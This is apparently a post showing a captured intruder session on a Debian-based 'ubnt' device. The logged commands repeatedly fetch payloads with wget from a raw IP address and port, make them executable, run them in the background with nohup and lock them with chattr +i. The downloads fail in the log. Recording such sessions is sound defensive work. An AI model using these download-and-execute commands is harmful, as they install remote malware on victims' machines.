Making sure he is in /
The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. ubnt@svr02:~# cd .. ubnt@svr02:/# cd .. ubnt@svr02:/# cd .. ubnt@svr02:/# cd .. ubnt@svr02:/# cd tmp ubnt@svr02:/tmp# wget uggc://118.193.189.229:6552/fo Sorry, SSL not supported in this release ubnt@svr02:/tmp# chmod 0777 fo chmod: cannot access fo: No such file or directory ubnt@svr02:/tmp# nohup /tmp/fo > /dev/null 2>&1 & nohup: ignoring input and appending output to `nohup.out' ubnt@svr02:/tmp# ./fo & bash: ./fo: command not found ubnt@svr02:/tmp# chattr +i fo ubnt@svr02:/tmp# wget uggc://118.193.189.229:6552/foo Sorry, SSL not supported in this release ubnt@svr02:/tmp# chmod 0777 foo chmod: cannot access foo: No such file or directory ubnt@svr02:/tmp# nohup /tmp/foo > /dev/null 2>&1 & nohup: ignoring input and appending output to `nohup.out' ubnt@svr02:/tmp# ./foo & bash: ./foo: command not found ubnt@svr02:/tmp# chattr +i foo ubnt@svr02:/tmp# wget uggc://118.193.189.229:6552/fd Sorry, SSL not supported in this release ubnt@svr02:/tmp# chmod 0777 fd chmod: cannot access fd: No such file or directory ubnt@svr02:/tmp# nohup /tmp/fd > /dev/null 2>&1 & nohup: ignoring input and appending output to `nohup.out' ubnt@svr02:/tmp# ./fd & bash: ./fd: command not found ubnt@svr02:/tmp# chattr +i fd ubnt@svr02:/tmp# wget uggc://118.193.189.229:6552/fm Sorry, SSL not supported in this release ubnt@svr02:/tmp# chmod 0777 fm chmod: cannot access fm: No such file or directory ubnt@svr02:/tmp# nohup /tmp/fm > /dev/null 2>&1 & nohup: ignoring input and appending output to `nohup.out' ubnt@svr02:/tmp# ./fm & bash: ./fm: command not found ubnt@svr02:/tmp# chattr +i fm ubnt@svr02:/tmp# exit ubnt@svr02:/tmp#Toggle Menu